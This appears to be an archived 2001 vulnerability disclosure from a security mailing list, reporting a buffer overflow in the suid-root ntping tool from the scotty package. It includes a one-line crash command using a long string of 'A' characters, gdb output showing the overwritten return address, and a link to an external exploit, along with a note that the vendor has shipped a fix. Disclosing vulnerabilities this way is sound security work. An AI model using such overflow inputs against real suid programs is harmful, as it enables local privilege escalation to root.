This has circulated on vuln-dev not sure if it made it here yet. Vendor has been notified and released a fixed version 2.1.11. My exploit: http://vapid.dhs.org/ntping_exp.c There is a much better exploit out there, but I am not sure if I have permission to distribute it. So I will leave that to the author. Credit: KF <dotslashat_private> ---------- Forwarded message ---------- Date: Tue, 12 Jun 2001 05:34:16 -0400 From: KF <dotslashat_private> To: vuln-devat_private Subject: suid scotty (ntping) overflow I am not sure that this made it on to the list the first time I sent it... so sorry if this is a duplicate [root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'` Segmentation fault (core dumped) Vendor: http://wwwhome.cs.utwente.nl/~schoenw/scotty/ What led me to research this: arndtat_private-tuebingen.de (Michael Arndt) wrote: > i run scotty-testsuite: what must i change on my system:(Linux > slackware): > ==== Test generated error: > can not connect straps socket: Permission denied straps and ntping must be installed suid root. ^------- Hrmm I sure thought that was interesting to know *grin* Vendors affected: unknown by the author of this document just a note I found however... <19990702221232.79B119410at_private> Hi folks, here is the long promised posting of all suid/sgid files on a alpha of SuSE Linux 6.2 ... comments on wrong permissions are welcome. Please note that SuSE has got 5 full CD-Roms so thats the reason for the many many files ... (and too much suid/sgid ones ...) ... -rwsr-xr-x 1 root root 33370 Jun 30 11:11 ./usr/bin/ntping -rwsr-xr-x 1 root root 18352 Jun 30 11:11 ./usr/bin/straps ... [root@linux d0tslash]# gdb /usr/bin/ntping core GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0 This GDB was configured as "i386-mandrake-linux"... (no debugging symbols found)... Core was generated by `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libnsl.so.1...(no debugging symbols found)...done. Loaded symbols for /lib/libnsl.so.1 Reading symbols from /lib/libresolv.so.2...(no debugging symbols found)...done. Loaded symbols for /lib/libresolv.so.2 Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done. Loaded symbols for /lib/libc.so.6 Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2 Reading symbols from /lib/libnss_files.so.2...done. Loaded symbols for /lib/libnss_files.so.2 #0 0x40079b66 in getenv () from /lib/libc.so.6 (gdb) bt #0 0x40079b66 in getenv () from /lib/libc.so.6 #1 0x4013aadb in inet_nsap_ntoa () from /lib/libc.so.6 #2 0x4013b9de in __res_ninit () from /lib/libc.so.6 #3 0x4013eb69 in __nss_hostname_digits_dots () from /lib/libc.so.6 #4 0x4013ff5f in gethostbyname () from /lib/libc.so.6 #5 0x080495b8 in _start () #6 0x41414141 in ?? () Cannot access memory at address 0x41414141 -KF
This archive was generated by hypermail 2b30 : Thu Jun 21 2001 - 17:42:15 PDT